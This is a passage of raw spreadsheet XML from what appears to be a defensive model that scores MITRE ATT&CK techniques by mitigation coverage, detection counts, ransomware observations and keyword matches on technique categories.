        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.1185904761904762</v>
      </c>
      <c r="AS222" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT222" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU22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23" spans="1:47" ht="32.1">
      <c r="A223" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>7.513333333333333E-2</v>
      </c>
      <c r="B223" s="25">
        <f>SUM(H223,M223,V223)*(1+SUM(AE223,AG223,AI223,AK223,AM223))</f>
        <v>0.41800000000000004</v>
      </c>
      <c r="C223" s="25" t="s">
        <v>973</v>
      </c>
      <c r="D223" s="25" t="s">
        <v>99</v>
      </c>
      <c r="E223" s="25" t="s">
        <v>974</v>
      </c>
      <c r="F223" s="51">
        <v>1</v>
      </c>
      <c r="G223" s="51">
        <v>1</v>
      </c>
      <c r="H223" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I223">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J223">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K223">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L223">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M223" s="25">
        <v>0</v>
      </c>
      <c r="N223" s="51">
        <v>0</v>
      </c>
      <c r="O223" s="51">
        <v>3</v>
      </c>
      <c r="P223" s="51">
        <v>0</v>
      </c>
      <c r="Q223" s="51">
        <v>0</v>
      </c>
      <c r="R223" s="52" t="s">
        <v>100</v>
      </c>
      <c r="S223" s="51">
        <v>8</v>
      </c>
      <c r="T223" s="52" t="s">
        <v>528</v>
      </c>
      <c r="U223" s="51">
        <v>13</v>
      </c>
      <c r="V223" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.2142857142857143</v>
      </c>
      <c r="W223">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>21</v>
      </c>
      <c r="X223">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.38181818181818183</v>
      </c>
      <c r="Y223">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.38181818181818183</v>
      </c>
      <c r="Z223">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>3</v>
      </c>
      <c r="AA223">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.03</v>
      </c>
      <c r="AB223">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.03</v>
      </c>
      <c r="AC223" s="29" t="s">
        <v>505</v>
      </c>
      <c r="AD223" s="25" t="str" cm="1">
        <f t="array" ref="AD223">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC223)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE223" s="25">
        <f>IF(AD223="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF223" s="25" t="str" cm="1">
        <f t="array" ref="AF223">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC223)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG223" s="25">
        <f>IF(AF223="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH223" s="25" t="str" cm="1">
        <f t="array" ref="AH223">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC223)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI223" s="25">
        <f>IF(AH223="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ223" s="25" t="str" cm="1">
        <f t="array" ref="AJ223">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC223)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK223" s="25">
        <f>IF(AJ223="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL223" s="25" t="str" cm="1">
        <f t="array" ref="AL223">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC223)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM223" s="25">
        <f>IF(AL223="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN223" s="60">
        <v>1</v>
      </c>
      <c r="AO223" s="51">
        <v>0</v>
      </c>
      <c r="AP223" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>7.513333333333333E-2</v>
      </c>
      <c r="AQ223" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.13933333333333334</v>
      </c>
      <c r="AR223" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.13933333333333334</v>
      </c>
      <c r="AS223" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT223" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU22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24" spans="1:47" ht="63.95">
      <c r="A224" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>4.1799999999999997E-2</v>
      </c>
      <c r="B224" s="25">
        <f>SUM(H224,M224,V224)*(1+SUM(AE224,AG224,AI224,AK224,AM224))</f>
        <v>0.41800000000000004</v>
      </c>
      <c r="C224" s="25" t="s">
        <v>975</v>
      </c>
      <c r="D224" s="25" t="s">
        <v>202</v>
      </c>
      <c r="E224" s="25" t="s">
        <v>976</v>
      </c>
      <c r="F224" s="51">
        <v>1</v>
      </c>
      <c r="G224" s="51">
        <v>1</v>
      </c>
      <c r="H224" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I224">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J224">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K224">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L224">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M224" s="25">
        <v>0</v>
      </c>
      <c r="N224" s="51">
        <v>1</v>
      </c>
      <c r="O224" s="51">
        <v>2</v>
      </c>
      <c r="P224" s="51">
        <v>0</v>
      </c>
      <c r="Q224" s="51">
        <v>0</v>
      </c>
      <c r="R224" s="52" t="s">
        <v>977</v>
      </c>
      <c r="S224" s="51">
        <v>8</v>
      </c>
      <c r="T224" s="52" t="s">
        <v>978</v>
      </c>
      <c r="U224" s="51">
        <v>13</v>
      </c>
      <c r="V224" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.2142857142857143</v>
      </c>
      <c r="W224">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>21</v>
      </c>
      <c r="X224">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.38181818181818183</v>
      </c>
      <c r="Y224">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.38181818181818183</v>
      </c>
      <c r="Z224">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>3</v>
      </c>
      <c r="AA224">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.03</v>
      </c>
      <c r="AB224">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.03</v>
      </c>
      <c r="AC224" s="29" t="s">
        <v>979</v>
      </c>
      <c r="AD224" s="25" t="str" cm="1">
        <f t="array" ref="AD224">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC224)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE224" s="25">
        <f>IF(AD224="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF224" s="25" t="str" cm="1">
        <f t="array" ref="AF224">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC224)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG224" s="25">
        <f>IF(AF224="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH224" s="25" t="str" cm="1">
        <f t="array" ref="AH224">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC224)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI224" s="25">
        <f>IF(AH224="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ224" s="25" t="str" cm="1">
        <f t="array" ref="AJ224">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC224)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK224" s="25">
        <f>IF(AJ224="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL224" s="25" t="str" cm="1">
        <f t="array" ref="AL224">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC224)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM224" s="25">
        <f>IF(AL224="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN224" s="52">
        <v>0</v>
      </c>
      <c r="AO224" s="51">
        <v>0</v>
      </c>
      <c r="AP224" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>4.1799999999999997E-2</v>
      </c>
      <c r="AQ224" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.13933333333333334</v>
      </c>
      <c r="AR224" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.13933333333333334</v>
      </c>
      <c r="AS224" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT224" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU22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25" spans="1:47">
      <c r="A225" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>3.7651428571428565E-2</v>
      </c>
      <c r="B225" s="25">
        <f>SUM(H225,M225,V225)*(1+SUM(AE225,AG225,AI225,AK225,AM225))</f>
        <v>0.37651428571428569</v>
      </c>
      <c r="C225" s="25" t="s">
        <v>980</v>
      </c>
      <c r="D225" s="25" t="s">
        <v>94</v>
      </c>
      <c r="E225" s="25" t="s">
        <v>981</v>
      </c>
      <c r="F225" s="51">
        <v>1</v>
      </c>
      <c r="G225" s="51">
        <v>1</v>
      </c>
      <c r="H225" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I225">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J225">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K225">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L225">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M225" s="25">
        <v>0</v>
      </c>
      <c r="N225" s="51">
        <v>1</v>
      </c>
      <c r="O225" s="51">
        <v>5</v>
      </c>
      <c r="P225" s="51">
        <v>0</v>
      </c>
      <c r="Q225" s="51">
        <v>3</v>
      </c>
      <c r="R225" s="52" t="s">
        <v>808</v>
      </c>
      <c r="S225" s="51">
        <v>7</v>
      </c>
      <c r="T225" s="52" t="s">
        <v>809</v>
      </c>
      <c r="U225" s="51">
        <v>11</v>
      </c>
      <c r="V225" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.21428571428571427</v>
      </c>
      <c r="W225">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>18</v>
      </c>
      <c r="X225">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.32727272727272727</v>
      </c>
      <c r="Y225">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.32727272727272727</v>
      </c>
      <c r="Z225">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>9</v>
      </c>
      <c r="AA225">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.09</v>
      </c>
      <c r="AB225">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.09</v>
      </c>
      <c r="AC225" s="29" t="s">
        <v>982</v>
      </c>
      <c r="AD225" s="25" t="str" cm="1">
        <f t="array" ref="AD225">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC225)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE225" s="25">
        <f>IF(AD225="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF225" s="25" t="str" cm="1">
        <f t="array" ref="AF225">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC225)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG225" s="25">
        <f>IF(AF225="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH225" s="25" t="str" cm="1">
        <f t="array" ref="AH225">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC225)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI225" s="25">
        <f>IF(AH225="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ225" s="25" t="str" cm="1">
        <f t="array" ref="AJ225">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC225)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK225" s="25">
        <f>IF(AJ225="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL225" s="25" t="str" cm="1">
        <f t="array" ref="AL225">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC225)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM225" s="25">
        <f>IF(AL225="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN225" s="52">
        <v>0</v>
      </c>
      <c r="AO225" s="51">
        <v>0</v>
      </c>
      <c r="AP225" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>3.7651428571428565E-2</v>
      </c>
      <c r="AQ225" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.1255047619047619</v>
      </c>
      <c r="AR225" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.1255047619047619</v>
      </c>
      <c r="AS225" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT225" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU22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26" spans="1:47">
      <c r="A226" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>8.2394285714285725E-2</v>
      </c>
      <c r="B226" s="25">
        <f>SUM(H226,M226,V226)*(1+SUM(AE226,AG226,AI226,AK226,AM226))</f>
        <v>0.49060952380952383</v>
      </c>
      <c r="C226" s="25" t="s">
        <v>983</v>
      </c>
      <c r="D226" s="25" t="s">
        <v>984</v>
      </c>
      <c r="E226" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F226" s="51">
        <v>2</v>
      </c>
      <c r="G226" s="51">
        <v>2</v>
      </c>
      <c r="H226" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.2</v>
      </c>
      <c r="I226">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.2</v>
      </c>
      <c r="J226">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.2</v>
      </c>
      <c r="K226">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.2</v>
      </c>
      <c r="L226">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.2</v>
      </c>
      <c r="M226" s="25">
        <v>0</v>
      </c>
      <c r="N226" s="51">
        <v>0</v>
      </c>
      <c r="O226" s="51">
        <v>3</v>
      </c>
      <c r="P226" s="51">
        <v>2</v>
      </c>
      <c r="Q226" s="51">
        <v>1</v>
      </c>
      <c r="R226" s="52" t="s">
        <v>985</v>
      </c>
      <c r="S226" s="51">
        <v>5</v>
      </c>
      <c r="T226" s="51" t="s">
        <v>986</v>
      </c>
      <c r="U226" s="51">
        <v>14</v>
      </c>
      <c r="V226" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.20952380952380956</v>
      </c>
      <c r="W226">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>19</v>
      </c>
      <c r="X226">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.34545454545454546</v>
      </c>
      <c r="Y226">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.34545454545454546</v>
      </c>
      <c r="Z226">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>6</v>
      </c>
      <c r="AA226">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.06</v>
      </c>
      <c r="AB226">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.06</v>
      </c>
      <c r="AC226" s="29" t="s">
        <v>136</v>
      </c>
      <c r="AD226" s="25" t="str" cm="1">
        <f t="array" ref="AD226">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC226)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE226" s="25">
        <f>IF(AD226="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF226" s="25" t="str" cm="1">
        <f t="array" ref="AF226">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC226)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG226" s="25">
        <f>IF(AF226="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH226" s="25" t="str" cm="1">
        <f t="array" ref="AH226">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC226)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI226" s="25">
        <f>IF(AH226="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ226" s="25" t="str" cm="1">
        <f t="array" ref="AJ226">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC226)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK226" s="25">
        <f>IF(AJ226="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL226" s="25" t="str" cm="1">
        <f t="array" ref="AL226">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC226)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM226" s="25">
        <f>IF(AL226="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN226" s="60">
        <v>1</v>
      </c>
      <c r="AO226" s="51">
        <v>1</v>
      </c>
      <c r="AP226" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>8.2394285714285725E-2</v>
      </c>
      <c r="AQ226" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.16353650793650795</v>
      </c>
      <c r="AR226" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.16353650793650795</v>
      </c>
      <c r="AS226" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT226" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU22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27" spans="1:47">
      <c r="A227" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>4.1166666666666664E-2</v>
      </c>
      <c r="B227" s="25">
        <f>SUM(H227,M227,V227)*(1+SUM(AE227,AG227,AI227,AK227,AM227))</f>
        <v>0.41166666666666668</v>
      </c>
      <c r="C227" s="25" t="s">
        <v>987</v>
      </c>
      <c r="D227" s="25" t="s">
        <v>197</v>
      </c>
      <c r="E227" s="25" t="s">
        <v>988</v>
      </c>
      <c r="F227" s="51">
        <v>1</v>
      </c>
      <c r="G227" s="51">
        <v>1</v>
      </c>
      <c r="H227" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I227">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J227">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K227">
